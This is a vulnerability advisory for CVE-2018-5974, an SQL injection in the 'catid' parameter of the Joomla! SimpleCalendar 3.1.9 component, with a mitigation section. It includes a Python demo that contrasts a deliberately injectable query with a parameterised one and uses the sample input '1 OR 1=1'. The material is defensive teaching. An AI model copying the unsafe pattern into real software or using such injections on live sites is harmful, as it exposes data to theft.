Vendor: SimpleCalendar
By: Ihsan Sencan
CVSS: 9.8 (CRITICAL)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: SimpleCalendar
Affected Version From: 3.1.9
Affected Version To: 3.1.9
Patch Exists: YES
Related CVE: CVE-2018-5974
CPE: a:albonico:simplecalendar:3.1.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
Year: 2018
Joomla! Component SimpleCalendar 3.1.9 – SQL Injection
Joomla! Component SimpleCalendar 3.1.9 is vulnerable to SQL Injection. The vulnerability exists because user-supplied input in the 'catid' parameter of the 'index.php' script is not sufficiently sanitized before it is used in a database query. An attacker can exploit it by sending a specially crafted HTTP request containing SQL code to the vulnerable application. Successful exploitation can result in unauthorized access to sensitive data, modification of data, and potentially server compromise.
Mitigation:
Developers should always sanitize user-supplied input and use parameterized queries to prevent SQL injection attacks.
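As an added illustration of the mitigation (not the component's own code, and written in Python rather than the component's PHP), the defective pattern of splicing a request parameter such as 'catid' into SQL text is shown next to the hardened form that validates the type and binds it as a query parameter. The table layout and rows are constructed for the demo and are not the SimpleCalendar schema.

```python
import sqlite3

# Constructed sample data standing in for a calendar component's event table.
EVENTS = [
    (1, 1, "Public meetup"),
    (2, 2, "Board meeting (restricted)"),
    (3, 2, "Budget review (restricted)"),
]


def make_db():
    """Build an in-memory database with the constructed events table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (id INTEGER, catid INTEGER, title TEXT)")
    db.executemany("INSERT INTO events VALUES (?, ?, ?)", EVENTS)
    return db


def list_events_unsafe(db, catid):
    """Defect pattern: the raw request parameter becomes part of the SQL text,
    so any value that is not a plain number changes the query's meaning."""
    sql = "SELECT title FROM events WHERE catid = " + catid
    return [row[0] for row in db.execute(sql)]


def list_events_safe(db, catid):
    """Hardened form: enforce the expected type, then bind the value as a
    parameter so the database engine never interprets it as SQL."""
    try:
        cat = int(catid)
    except (TypeError, ValueError):
        raise ValueError("catid must be an integer") from None
    rows = db.execute("SELECT title FROM events WHERE catid = ?", (cat,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    # Only the requested category is returned by the hardened query.
    print(list_events_safe(db, "1"))
    # A non-numeric catid is rejected before it reaches the database.
    try:
        list_events_safe(db, "1 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```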